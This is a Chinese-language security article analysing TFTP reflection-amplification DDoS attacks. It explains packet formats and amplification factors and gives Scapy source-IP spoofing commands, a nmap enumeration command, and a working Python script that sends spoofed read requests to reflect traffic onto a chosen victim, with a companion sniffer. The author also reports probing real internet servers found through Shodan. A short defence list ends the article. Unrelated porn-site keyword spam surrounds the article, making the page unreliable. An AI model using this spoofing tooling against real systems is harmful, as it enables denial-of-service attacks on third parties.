精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

DDoS攻擊之淺析TFTP反射放大攻擊

安全 黑客攻防
本文就在Evaluation of TFTP DDoS amplification attack論文的基礎(chǔ)上,利用Kali2等虛擬機(jī),對反射流量和反射因子進(jìn)行檢測計算,適當(dāng)探究相關(guān)的限制與利用。

0x00 前言

經(jīng)由@殺戮提示,讓我看看softpedia上的這篇報道,咱就來研究一下文中的使用TFTP(Trivial File Transfer Protocol,簡單文件傳輸協(xié)議)進(jìn)行反射型DDoS攻擊。在報道的最后提到了Evaluation of TFTP DDoS amplification attack這篇論文,論文還是比較學(xué)術(shù)派和嚴(yán)謹(jǐn)?shù)?,其中使用GNS3和虛擬機(jī)搭建模擬環(huán)境,盡量嚴(yán)格控制相關(guān)變量與不變量,對TFTPD32,SolarWinds,OpenTFTP三種TFTP服務(wù)器進(jìn)行研究。論文中還利用TFTP協(xié)議自身的缺陷來進(jìn)行DOS攻擊,同時對DOS攻擊的反射因子,請求響應(yīng)延遲,總吞吐量,CPU消耗率等方面進(jìn)行了詳細(xì)的測驗與評估。

當(dāng)然,自己實際地測試觀察TFTP反射放大攻擊的影響還是很有必要的。所以本文就在那篇論文的基礎(chǔ)上,利用Kali2等虛擬機(jī),對反射流量和反射因子進(jìn)行檢測計算,適當(dāng)探究相關(guān)的限制與利用。

0x01 TFTP服務(wù)搭建

DDoS是分布式拒絕服務(wù)攻擊,研究的基礎(chǔ)也就在于拒絕服務(wù);論文中三種TFTP服務(wù)器的測試也是為了相互對比參照,由于不同服務(wù)器的特性不同而響應(yīng)的行為也不同,其中的任何一種服務(wù)也具有通用的特性。所以為了方便驗證研究,我們就簡單地搭建在Kali2上搭建tftp服務(wù)(對于協(xié)議特點的學(xué)習(xí),我比較喜歡直觀的辦法,搭建好必要服務(wù)后抓包看其數(shù)據(jù)包的結(jié)構(gòu)),對其反射放大流量的利用進(jìn)行測試,而暫且拋開分布式和其他類型服務(wù)器的對比話題。相信這些都是見微知著的,也歡迎你進(jìn)行其他方面的深入探究交流。

我們在更新源了的Kali2上進(jìn)行tftp的安裝,詳細(xì)過程可見這里和那里。在Kali上自帶的有tftp客戶端,我們可以不用再進(jìn)行安裝。其中主要使用了使用xinetd超級守護(hù)進(jìn)程更加方便安全地管理使用tftp服務(wù)。最后在服務(wù)都安裝好后,測試圖如下:

DDoS攻擊之淺析TFTP反射放大攻擊

 

在這里值得一提的是,客戶端上鍵入?發(fā)現(xiàn)有put命令可以直接上傳文件,但是會引發(fā)Error code 2: Access violation錯誤。究其原因查看man手冊可知道,因為咱們之前在登錄的時候沒有經(jīng)過認(rèn)證就可以讀取文件,所以處于安全的考慮,只有文件存在而且對于所有的用戶都可寫才能put相應(yīng)文件,這一點也會成為之后攻擊的一個限制。

0x02 TFTP協(xié)議簡介

對于TFTP協(xié)議百度和WiKi也有比較詳細(xì)的介紹,這里不多贅述。我覺得其中最需要理解的有以下三點:

TFTP是基于UDP的,也就是沒有狀態(tài)性,其端口號為69

無認(rèn)證過程(對源地址和目的地址均無)

TFTP幾種不同類型的數(shù)據(jù)包在傳遞信息時的交互過程

下面給出TFTP數(shù)據(jù)包的幾種類型:

TFTP Formats    

   Type   Op #     Format without header    

          2 bytes    string   1 byte     string   1 byte
          -----------------------------------------------
   RRQ/  | 01/02 |  Filename  |   0  |    Mode    |   0  |
   WRQ    -----------------------------------------------
          2 bytes    2 bytes       n bytes
          ---------------------------------
   DATA  | 03    |   Block #  |    Data    |
          ---------------------------------
          2 bytes    2 bytes
          -------------------
   ACK   | 04    |   Block #  |
          --------------------
          2 bytes  2 bytes        string    1 byte
          ----------------------------------------
   ERROR | 05    |  ErrorCode |   ErrMsg   |   0  |

就拿A對S上的RRQ (read request)文件過程來演示一下,如下圖:

DDoS攻擊之淺析TFTP反射放大攻擊

 

具體過程文字描述如下:

A向S的69端口發(fā)送RRQ數(shù)據(jù)包請求讀取文件,其中包括文件名和傳輸使用的模式。

S再新開一個端口發(fā)送DATA數(shù)據(jù)包開始傳輸文件,其中Data段中包含著文件內(nèi)容,如果大于512字節(jié)(默認(rèn)值),就會進(jìn)行分塊傳輸(對應(yīng)標(biāo)記Block的值),直到最后一次發(fā)送的數(shù)據(jù)包Data段小于512字節(jié)。

A在接收到DATA數(shù)據(jù)包后就向S發(fā)送ACK數(shù)據(jù)包進(jìn)行確認(rèn),其中的Block就為接收到的DATA數(shù)據(jù)包中的Blocak,然后S才會繼續(xù)發(fā)下一個Block的DATA數(shù)據(jù)包。

如果S沒有接收到A的ACK數(shù)據(jù)包,S就會重傳剛才發(fā)過的DATA數(shù)據(jù)包。

實際測試的抓包圖如下:

DDoS攻擊之淺析TFTP反射放大攻擊

 

0x03 反射放大攻擊

反射是過程,放大是結(jié)果。對于拒絕服務(wù)攻擊來說,常用的方式有這么幾種:1.濫用合理的服務(wù)請求;2.制造高流量無用數(shù)據(jù);3.利用傳輸協(xié)議缺陷;4.利用服務(wù)程序的漏洞。TFTP反射放大攻擊就是利用了協(xié)議上的缺陷或者說是特性,其中關(guān)鍵點有二:

沒有認(rèn)證過程,這樣就可以隨意登錄讀取文件,同時偽造源(攻擊目標(biāo))IP地址,為反射做好準(zhǔn)備

之前提到的重傳機(jī)制,當(dāng)服務(wù)端在沒有收到我們的攻擊目標(biāo)的ACK包時,就會重傳一定的次數(shù)給攻擊目標(biāo),達(dá)到放大的目的

下面我就在本機(jī)上借由Scapy偽造源地址數(shù)據(jù)包,向服務(wù)端(Kali2)發(fā)送RRQ數(shù)據(jù)包請求get服務(wù)器上的文件,進(jìn)而將響應(yīng)DATA包發(fā)射給目標(biāo)機(jī)(XP),誘發(fā)重傳機(jī)制造成放大攻擊。利用Scapy如下:

  1. >>> a = IP(dst='192.168.1.104',src='192.168.1.102')/UDP(sport=445,dport=69)/TFTP()/TFTP_RRQ(filename='larry'
  2. >>> a 
  3. <IP  frag=0 proto=udp src=192.168.1.102 dst=192.168.1.104 |<UDP  sport=microsoft_ds dport=tftp |<TFTP  op=RRQ |<TFTP_RRQ  filename='larry' |>>>> 

也還是有兩點需要說明,我們這里偽造的源端口用的是XP SP3默認(rèn)開啟的UDP端口之一(123,137,138,445,500,1900),當(dāng)然你也可以用其他你在攻擊目標(biāo)上掃描出來的端口;另一點就是為了達(dá)到放大數(shù)據(jù)包大小的最佳效果,我們這里RRQ的已知文件的大小必須大于512字節(jié)為好。三個主機(jī)在同一個網(wǎng)段下的測試結(jié)果圖如下:

DDoS攻擊之淺析TFTP反射放大攻擊

 

在搭建傳統(tǒng)的LAN環(huán)境的時候,會要求TFTP服務(wù)器對所有客戶端是可連接的,通常會將其拿來當(dāng)做內(nèi)部網(wǎng)絡(luò)網(wǎng)關(guān)。如果這些TFTP服務(wù)器同時暴露在外的話,我們就可以利用其在網(wǎng)絡(luò)當(dāng)中的角色加上對源地址無驗證的缺陷,對內(nèi)網(wǎng)機(jī)器進(jìn)行DOS攻擊。當(dāng)然雞肋的會是我們不知道在內(nèi)網(wǎng)當(dāng)中有哪些機(jī)器,就算攻擊成功了,由于沒有回執(zhí)響應(yīng),我們就不知道實際情況是如何而“盲打”一通了。在vbox當(dāng)中創(chuàng)建一個內(nèi)網(wǎng)環(huán)境,同時給服務(wù)端設(shè)置兩個網(wǎng)卡,測試結(jié)果如下:

DDoS攻擊之淺析TFTP反射放大攻擊

 

從以上的測試結(jié)果可以看出由于tftpd服務(wù)的特性,在服務(wù)端未接收到ACK數(shù)據(jù)包時,會默認(rèn)進(jìn)行5次重傳,并且重傳時間間隔(可設(shè)置)為5秒。對于不同的反射放大攻擊,例如Smurf,DNS,NTP,TCP-based,SNMP等反射放大攻擊,研究時通常會計算其中的反射因子/放大倍數(shù)作為相互比較的標(biāo)準(zhǔn)。在基于tftpd的TFTP反射放大攻擊中,這里響應(yīng)數(shù)據(jù)包大小總和比上請求數(shù)據(jù)包大小為:558*5/60=46.5。為了簡單地對比一下,我還是在XP上下載了tftpd32,然后再去get自帶的文件tftpd32.chm(其實在默認(rèn)狀態(tài)下tftpd32是允許put文件的,但也可在Setting中設(shè)置為Read Only模式)。tftpd32的特性就是會重傳6次,時間間隔依次為1,2,3,3,3秒,最后還會發(fā)送一個ERROR數(shù)據(jù)包。這里拋開ERROR數(shù)據(jù)包計算反射因子的話就是558*6/62=54。

DDoS攻擊之淺析TFTP反射放大攻擊

 

在論文中的tftpd32版本可能有所不同,反射因子為59.78,這個放大因子和其他反射放大攻擊相比較還是很可觀的:

DDoS攻擊之淺析TFTP反射放大攻擊

 

0x04 限制及解決方案

在以上的測試過程中,對于TFTP反射放大攻擊利用的限制點主要有三點:

1. 獲取TFTP服務(wù)器上存在的文件名

雖然服務(wù)器端無認(rèn)證過程可以隨意登錄,但是無法列目錄,而造成反射的基礎(chǔ)就是需要服務(wù)端能夠發(fā)送出DATA數(shù)據(jù)包。這就需要我們一個個get測試看看TFTP服務(wù)器上存在哪些常見的文件了,我們可以對思科(廣泛使用TFTP服務(wù))設(shè)備文件和其他你認(rèn)為有可能存在的文件進(jìn)行測試。還好nmap在這里給我們提供了一個tftp-enum.nse腳本,可以如下使用:

$ sudo nmap -sU -p 69 --script tftp-enum.nse --script-args="tftp-enum.filelist=customlist.txt"

如果未加--script-args的話,腳本會默認(rèn)調(diào)用tftplist.txt文件去枚舉可能存在的文件。當(dāng)然,tftp-enum.filelist可以指定自定義的列表進(jìn)行枚舉掃描。測試結(jié)果示例如下:

DDoS攻擊之淺析TFTP反射放大攻擊

 

論文當(dāng)中說是有599600臺(2012年掃描結(jié)果)對外開放的TFTP服務(wù)器可能會被用來進(jìn)行發(fā)射放大攻擊,但在shodan上搜索tftp的結(jié)果也只有10w左右的樣子,可能有待進(jìn)一步的掃描發(fā)現(xiàn)。以下是我在shodan中搜索出的999個IP進(jìn)行測試,其中有47個服務(wù)器可以get到默認(rèn)的文件:

DDoS攻擊之淺析TFTP反射放大攻擊

 

2. TFTP服務(wù)器上已知文件的大小

反射過來的DATA數(shù)據(jù)包的大小取決于讀取文件的內(nèi)容大小,這樣就決定了我們最終反射放大的程度(相對于已知文件的文件名長度——影響請求包大小)。如果DATA數(shù)據(jù)包過小造成的影響也就很有限的了。

3. 確定TFTP服務(wù)器可利用

除了以上兩點,如果存在其他的過濾機(jī)制,我們最終就需要測試一下該TFTP服務(wù)是否可利用,在攻擊端偽造簡單的數(shù)據(jù)包觸發(fā)其反射到指定的主機(jī)上,代碼如下:

  1. #!/usr/bin/env python 
  2. #coding=utf-8     
  3.   
  4. import optparse 
  5. import sys 
  6. import logging     
  7.   
  8. from scapy.all import *    
  9.   
  10. class Trigger(object): 
  11.     def __init__(self, target, port, filename, server): 
  12.         logging.getLogger('scapy.runtime').setLevel(logging.ERROR) 
  13.         self.target = target 
  14.         self.port = port 
  15.         self.filename = filename 
  16.         self.server = server     
  17.   
  18.     def run(self): 
  19.         t = IP(src=self.target, dst=self.server)/UDP(sport=self.port, dport=69)/TFTP()/TFTP_RRQ(filename=self.filename) 
  20.         send(t) 
  21.         print '[+] The trigger has benn sent !'    
  22.   
  23. if __name__ == '__main__': 
  24.     parser = optparse.OptionParser('uasge: %prog [options]') 
  25.     parser.add_option('-t', '--target', default=None,help='The ip of target'
  26.     parser.add_option('-f', '--filename', default='larry'help='The filename for RRQ'
  27.     parser.add_option('-p', '--port', type=intdefault=2333help='The src port of target')     
  28.   
  29.     (options, args) = parser.parse_args() 
  30.     if len(args) < 1 or options.target == None: 
  31.         parser.print_help() 
  32.         sys.exit(0)     
  33.   
  34.     trigger = Trigger(target=options.target, port=options.port, filename=options.filename, server=args[0])     
  35.   
  36.     trigger.run() 

在我們之前指定的主機(jī)上檢測一下是否有如期的DATA數(shù)據(jù)包到來即可,代碼如下:

  1. #!/usr/bin/env python 
  2. #coding=utf-8     
  3.   
  4. import optparse 
  5. import sys 
  6. import logging     
  7.   
  8. from scapy.all import *    
  9.   
  10. class Sniff(object): 
  11.     def __init__(self, port): 
  12.         logging.getLogger('scapy.runtime').setLevel(logging.ERROR) 
  13.         self.port = port     
  14.   
  15.     def run(self): 
  16.         try: 
  17.             sniff(prn=self.udp_monitor_callback, filter='udp'store=0
  18.         except KeyboardInterrupt as e: 
  19.             print '[+] Bye !' 
  20.             sys.exit(0)     
  21.   
  22.     def udp_monitor_callback(self, pkt): 
  23.         if pkt.getlayer(Raw): 
  24.             raw_load = pkt.getlayer(Raw).load 
  25.             if pkt[UDP].dport == self.port and raw_load[:4] == '\x00\x03\x00\x01': 
  26.                 print '[+] The server %s is available' % (pkt[IP].src) 
  27.                 sys.exit(0)     
  28.   
  29. if __name__ == '__main__': 
  30.     parser = optparse.OptionParser('usage: %prog [options]') 
  31.     parser.add_option('-p', '--port', type=intdefault=2333help='The port from server')     
  32.   
  33.     (options, args) = parser.parse_args() 
  34.     if len(args) > 0: 
  35.         parser.print_help() 
  36.         sys.exit(0)     
  37.   
  38.     s = Sniff(port=options.port)     
  39.   
  40.     s.run() 

這樣一放一收就可以知道該TFTP服務(wù)器是否可以利用了。

0x05 防御及相關(guān)對策

雖然有些TFTP服務(wù)器因為配置錯誤而暴露在外,但還是應(yīng)該利用防火墻將其從互聯(lián)網(wǎng)上隔離

對流經(jīng)TFTP服務(wù)的流量設(shè)置相關(guān)入侵檢測機(jī)制

將重傳(數(shù)據(jù)包)率設(shè)置為1,但還是需要和服務(wù)不可達(dá)的情況做一下平衡

簡化自定義錯誤消息(有些tftp服務(wù)具有在重傳無響應(yīng)后還會發(fā)送ERROR數(shù)據(jù)包,間接將流量放大);記錄響應(yīng)的日志;限制請求數(shù)據(jù)包的數(shù)量

責(zé)任編輯:藍(lán)雨淚 來源: 烏云知識庫
相關(guān)推薦

2015-08-26 11:23:58

2010-09-16 21:20:02

2010-09-27 08:46:53

2020-12-30 09:27:55

漏洞DDoS攻擊網(wǎng)絡(luò)攻擊

2015-08-21 19:01:12

2019-05-13 10:42:53

2012-11-30 14:54:48

2017-10-12 15:41:45

2022-04-28 06:22:32

DDoS攻擊網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2014-01-13 09:30:20

2017-06-08 19:19:10

2016-09-29 22:54:55

2018-11-02 12:37:53

DDos攻擊信息安全攻擊

2021-01-25 10:45:10

DDoSRDP服務(wù)器Windows

2015-03-11 15:58:17

2010-10-08 09:25:55

2020-10-14 07:59:05

什么是DDOS攻擊

2015-07-23 10:18:45

2021-11-22 11:11:39

僵尸網(wǎng)絡(luò)DDoS攻擊黑客

2010-09-30 10:01:38

點贊
收藏

51CTO技術(shù)棧公眾號

亚洲午夜久久久久| 香蕉成人久久| 欧美第一区第二区| 免费一级特黄特色毛片久久看| 日本精品一区二区在线观看| 日韩精品视频网| 久久中文精品视频| 激情综合丁香五月| 欧美成人免费全部网站| 欧美区一区二| 亚洲国产第一页| 欧美一级裸体视频| 欧美xxxx性xxxxx高清| 久久午夜免费电影| 久久久久久这里只有精品| 亚洲AV无码国产精品| 99精品美女视频在线观看热舞| 亚洲图片有声小说| 亚洲欧美电影在线观看| 亚洲欧美在线观看视频| 欧美日韩视频免费看| 一区二区三区 在线观看视频 | 黄色污污视频软件| 午夜久久tv| 中文字幕精品一区久久久久| 在线黄色免费网站| 国产高清日韩| 亚洲一区二区91| 91精品国产视频| 国产一区二区三区在线免费观看 | 久色乳综合思思在线视频| 少妇特黄一区二区三区| 日韩精品久久久久久久软件91| 一本色道a无线码一区v| 福利在线一区二区| 久cao在线| 国产精品免费丝袜| 欧美久久久久久| 婷婷伊人综合中文字幕| 国产东北露脸精品视频| 国产日韩精品在线播放| 不卡av电影在线| 国产一区导航| 97精品伊人久久久大香线蕉| 丰满人妻一区二区三区大胸| 成人免费一区| 欧洲亚洲国产日韩| 国产日韩一区二区在线观看| 色老头在线一区二区三区| 亚洲444eee在线观看| 欧美日韩福利在线| 丁香花在线观看完整版电影| 亚洲一区二区三区四区五区中文| 一道本在线观看视频| 日本不卡视频| 《视频一区视频二区| 99热在线国产| 亚洲国产中文字幕在线| 国产69精品久久久久777| av免费精品一区二区三区| 亚洲免费国产视频| 成人爱爱电影网址| 国产精品久久久久久久app| 午夜精品一区二| 免费亚洲婷婷| 国产精品成熟老女人| 精品一区二区无码| 蜜臀av一级做a爰片久久| 国产精品夜间视频香蕉| 91中文字幕在线视频| 国产一区二区电影| 成人一区二区三区四区| 人妻视频一区二区三区| 久久日一线二线三线suv| 狠狠色噜噜狠狠色综合久| 中国女人一级一次看片| 久久精品国产精品青草| 亚洲专区国产精品| 日本免费不卡视频| 国产日产精品1区| 亚洲欧美电影在线观看| 最新超碰在线| 欧美日韩午夜剧场| 校园春色 亚洲色图| 99热这里有精品| 精品国产a毛片| 中国毛片在线观看| 99久久激情| 亚洲人成伊人成综合网久久久 | 色播五月综合网| 日本在线视频中文有码| 精品久久久久久久久久久久久| 成人免费毛片播放| 日韩区一区二| 亚洲网站视频福利| 一区视频免费观看| 亚洲综合日韩| 亚洲sss综合天堂久久| 四虎在线视频免费观看| 国产精品久久久久婷婷| 免费毛片网站在线观看| 美女视频一区| 亚洲精品国精品久久99热 | 青青草综合网| 欧美黑人一级爽快片淫片高清| 好看的av在线| 国产在线精品一区二区夜色| 久久精品国产一区二区三区日韩| 99在线观看免费| 99综合电影在线视频| 亚洲巨乳在线观看| 极品在线视频| 欧美一区二区不卡视频| 免费看裸体网站| 在线播放精品| 亚洲精品日产aⅴ| 国产福利电影在线| 婷婷夜色潮精品综合在线| 怡红院亚洲色图| 精品亚洲自拍| 不卡毛片在线看| www.久久视频| 91视视频在线观看入口直接观看www | 91激情视频在线观看| 国内精品美女在线观看| 国产精品视频久久久久| 亚洲欧美日韩动漫| 亚洲一区二区欧美| 伊人免费视频二| 精品一级毛片| 欧美在线视频a| 欧美一区二区三区成人片在线| 亚洲伦理在线精品| 一级做a免费视频| 欧美日韩中字| 日韩女优在线播放| 天堂在线资源8| 亚洲午夜久久久久久久久电影院| 亚洲制服在线观看| 婷婷激情成人| 在线日韩第一页| 日本免费精品视频| 久久天堂av综合合色蜜桃网| 给我免费播放片在线观看| 一区二区三区在线免费看| 久久精品国产96久久久香蕉| 影音先锋国产在线| 国产欧美日韩三区| 亚洲天堂av线| 日韩国产欧美| 国产日本欧美一区二区三区在线| av大片在线观看| 欧美日韩亚洲综合一区| 性少妇xx生活| 久久电影网站中文字幕| 中文字幕久精品免| 国产一区二区三区| 欧美精品在线免费播放| 中文字幕第四页| 94色蜜桃网一区二区三区| 日韩精品无码一区二区三区| 精品国产丝袜高跟鞋| 欧美美女一区二区在线观看| 99久久精品久久亚洲精品| 精品一区二区三区在线播放| a级黄色片网站| 欧美中文高清| 久久人人看视频| 欧美在线观看在线观看| 欧洲一区二区三区在线| 可以免费看av的网址| 国产在线一区二区| 久久在线中文字幕| 婷婷成人影院| 国产精品亚发布| 亚洲小说区图片区都市| 亚洲国产日韩欧美综合久久| 日本网站免费观看| 久久久久久久久伊人| 日韩成人精品视频在线观看| 欧美三级不卡| 欧洲视频一区二区三区| 91亚洲精品在看在线观看高清| 欧美极品美女视频网站在线观看免费| 人成网站在线观看| 欧美色图12p| 日韩一区二区三区四区在线| 91在线视频免费91| 在线观看免费的av| av不卡免费看| 97视频热人人精品| 毛片电影在线| 自拍偷拍亚洲一区| 亚洲精品无码久久久| 欧美综合在线视频| 免费在线观看日韩| 欧美激情在线免费观看| 一级黄色大片免费看| 日日摸夜夜添夜夜添精品视频| 国产精品一区在线免费观看| 电影久久久久久| 久99久在线视频| 免费在线观看一级毛片| 红桃视频成人在线观看| 免费在线观看a视频| 国产成人aaaa| 五月天激情视频在线观看| 亚洲黄色在线| gogogo免费高清日本写真| 日韩精选在线| 91福利入口| 精品网站在线| 色久欧美在线视频观看| 丰满少妇高潮在线观看| 欧美日韩和欧美的一区二区| 国产成人一区二区三区影院在线| 日韩美女视频一区| 日韩免费成人av| 91蜜桃免费观看视频| 国产又黄又嫩又滑又白| 麻豆精品蜜桃视频网站| 成人黄色片视频| av不卡在线看| 久久男人资源站| 五月精品视频| 一本一生久久a久久精品综合蜜| 天堂俺去俺来也www久久婷婷| 成人综合av网| 亚洲综合网狠久久| 91热福利电影| 97精品资源在线观看| 国产热re99久久6国产精品| 欧美性理论片在线观看片免费| 国语自产偷拍精品视频偷 | 九九九九九国产| 视频在线观看91| 日批视频在线免费看| 99国产精品视频免费观看一公开| 国产又粗又长又爽视频| 亚洲天堂一区二区三区四区| 51午夜精品| 亚洲视频资源| 91久久精品在线| 在线免费成人| 亚洲一区中文字幕在线观看| 精品久久国产一区| 91亚洲精华国产精华| 国产激情综合| 99久re热视频这里只有精品6| 日韩免费高清视频网站| 不卡日韩av| 精品成人自拍视频| 国产一区二区视频在线免费观看| 国产66精品| 久久99九九| 神马电影久久| 在线成人av电影| 68国产成人综合久久精品| 操bbb操bbb| 在线观看视频免费一区二区三区| 无码人妻少妇伦在线电影| av成人黄色| 超碰在线人人爱| 久久机这里只有精品| 男女视频在线观看网站| 国产不卡一区视频| 中文字幕在线观看网址| 国产清纯在线一区二区www| 老司机精品免费视频| 亚洲另类在线视频| 日韩精品视频免费看| 福利二区91精品bt7086| 一区二区三区在线免费观看视频| 欧美老年两性高潮| 亚洲国产www| 精品亚洲精品福利线在观看| www.在线视频.com| 欧美成人免费观看| 妞干网免费在线视频| 国产精品美女久久久久av超清| 成人51免费| 韩国精品一区二区三区六区色诱| 国产精品欧美三级在线观看| av不卡在线免费观看| 国产视频一区免费看| 中文字幕亚洲乱码| www.亚洲人| 99久久精品久久亚洲精品| 亚洲成人自拍网| 强行糟蹋人妻hd中文| 高跟丝袜欧美一区| 91国产免费视频| 亚洲精品成人av| a天堂中文在线88| 国内精品久久久久影院 日本资源| 三上悠亚激情av一区二区三区| 91午夜在线播放| 女人av一区| 欧妇女乱妇女乱视频| 日本色综合中文字幕| 国产精品无码一本二本三本色| 蜜桃视频在线观看一区二区| 欧产日产国产精品98| 国产精品进线69影院| 亚洲影院在线播放| 日韩精品中午字幕| jizzjizz在线观看| 性色av一区二区三区在线观看| 国产精品日本一区二区三区在线| 美女一区视频| 欧美+亚洲+精品+三区| 国产精品人人爽人人爽| 91热门视频在线观看| 欧美久久久久久久久久久久| 欧美日韩综合在线| 日本天堂影院在线视频| 欧美黑人xxxx| 欧美久久亚洲| avove在线观看| 蜜臀久久久久久久| 色婷婷av777| 激情久久av一区av二区av三区 | 日韩精品中文字幕在线观看 | 亚洲国产视频一区二区| 91极品身材尤物theporn| 亚洲图片欧洲图片av| 亚洲天堂导航| 久久精品国产综合精品| 伊人久久亚洲美女图片| 91av免费观看| 亚洲美女少妇撒尿| 一级全黄少妇性色生活片| 在线观看免费高清视频97| 成人影院入口| 久久久久免费网| 亚洲在线电影| 国产色视频一区二区三区qq号| 五月天中文字幕一区二区| 丰满岳乱妇国产精品一区| 欧美成人性生活| 日本免费一区二区三区视频| 性欧美18一19内谢| 精品一区二区三区香蕉蜜桃| www.av免费| 欧美一区午夜精品| 菠萝蜜视频国产在线播放| 91日本视频在线| 午夜亚洲福利| 91精品国产高清91久久久久久| 一区二区三区在线观看网站| 精品国产亚洲av麻豆| 欧美激情视频网站| 国产图片一区| 国产肥臀一区二区福利视频| 2022国产精品视频| 无码视频在线观看| 中文字幕免费精品一区高清| 香蕉久久一区| 国产一区 在线播放| 成人动漫av在线| 9i看片成人免费看片| 国产一区二区黑人欧美xxxx| 日韩精品第二页| 大陆极品少妇内射aaaaaa| 大尺度一区二区| 7799精品视频天天看| 日韩中文娱乐网| 国产精品一区二区三区四区在线观看| 18视频在线观看娇喘| 成年人网站91| 成人黄色三级视频| 久久夜色精品国产欧美乱| 超碰精品在线观看| www.国产区| **网站欧美大片在线观看| 亚洲精品喷潮一区二区三区| 热99精品里视频精品| 99欧美视频| 四虎精品一区二区| 国产女人18毛片水真多成人如厕| 亚洲一区精品在线观看| 欧美日本中文字幕| 日韩母乳在线| 久久久久久综合网| 偷拍亚洲欧洲综合| 日本在线看片免费人成视1000| 欧美一乱一性一交一视频| 欧美三级情趣内衣| 国产精品99精品无码视亚| 色婷婷一区二区三区四区| 精品国产丝袜高跟鞋| 免费看成人片| 高清国产一区二区三区| 久久午夜鲁丝片| 久久免费高清视频| 欧美独立站高清久久| 风间由美一二三区av片| 这里只有精品视频在线观看| 亚洲人体视频| www.男人天堂网|